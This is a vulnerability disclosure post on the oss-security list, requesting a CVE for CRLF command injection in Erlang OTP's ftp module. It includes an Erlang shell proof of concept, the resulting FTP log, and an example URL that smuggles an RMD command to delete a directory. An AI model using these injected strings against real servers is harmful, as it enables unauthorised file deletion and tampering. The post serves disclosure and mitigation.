|
Message-ID: <CAM4=iJ2tXAuMETRMLqJAyKbzYTY7R3iN_P9o6DxCUCr+HXdDLA@mail.gmail.com> Date: Tue, 28 Jan 2014 22:48:41 +0100 From: Seba <argos83@...il.com> To: cve-assign@...re.org, oss-security@...ts.openwall.com Subject: CVE Request: Erlang OTP - ftp module - FTP Command Injection Hi, This has been reported to erlang-bugs mailing list: http://erlang.org/pipermail/erlang-bugs/2014-January/003998.html There is an FTP Command Injection vulnerability in the "ftp" module. All those functions that write any string argument in the control socket seem to be vulnerable: user/3 user/4 account/2 cd/2 ls/2 nlist/2 rename/3 delete/2 mkdir/2 rmdir/2 recv/2 recv/3 recv_bin/2, recv_chunk_start/2 send/3 send_bin/3 send_chunk_start/2 append_chunk_start/2 append/2 append/3 append_bin/3 Vulnerability Description ------------------------- By injecting a \r\n sequence followed by a new command in a function argument you get the ftp module to write the whole string in the socket. E.g. the following erlang shell session: 1> inets:start(). ok 2> {ok, Pid} = inets:start(ftpc, [{host, "127.0.0.1"}]). {ok,<0.46.0>} 3> ftp:user(Pid, "anonymous", "password\r\nCWD pub\r\nMKD new_dir"). ok 4> ftp:cd(Pid, "/pub\r\nRMD new_dir\r\nPASV"). ok Generates the following FTP session: FTP command: Client "127.0.0.1", "USER anonymous" FTP response: Client "127.0.0.1", "331 Please specify the password." FTP command: Client "127.0.0.1", "PASS <password>" FTP response: Client "127.0.0.1", "230 Login successful." FTP command: Client "127.0.0.1", "CWD pub" FTP response: Client "127.0.0.1", "250 Directory successfully changed." FTP command: Client "127.0.0.1", "MKD new_dir" FTP response: Client "127.0.0.1", "257 "/pub/new_dir" created" FTP command: Client "127.0.0.1", "CWD /pub" FTP response: Client "127.0.0.1", "250 Directory successfully changed." FTP command: Client "127.0.0.1", "RMD new_dir" FTP response: Client "127.0.0.1", "250 Remove directory operation successful." FTP command: Client "127.0.0.1", "PASV" FTP response: Client "127.0.0.1", "227 Entering Passive Mode (127,0,0,1,130,161)." Attack Scenario Example ----------------------- A web server allow users to navigate and download documents. Internally the web server connects to a private ftp server using OTP "ftp" module. An attacker might take advantage of the vulnerability to execute actions that aren't supposed to be exposed. E.g. delete a directory by requesting: http://www.example.com/list_dir.yaws?dir=/docs/%0d%0aRMD+/docs Tested on --------- - Erlang OTP: R15B03 - Ubuntu 12.04 x86_64 - FTP Sever: vsftpd Mitigation ---------- Until this is fixed and the proper sanitization is implemented within the ftp module, string arguments should get "\r" and "\n" removed before being passed to these functions. Sebastián Tello
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.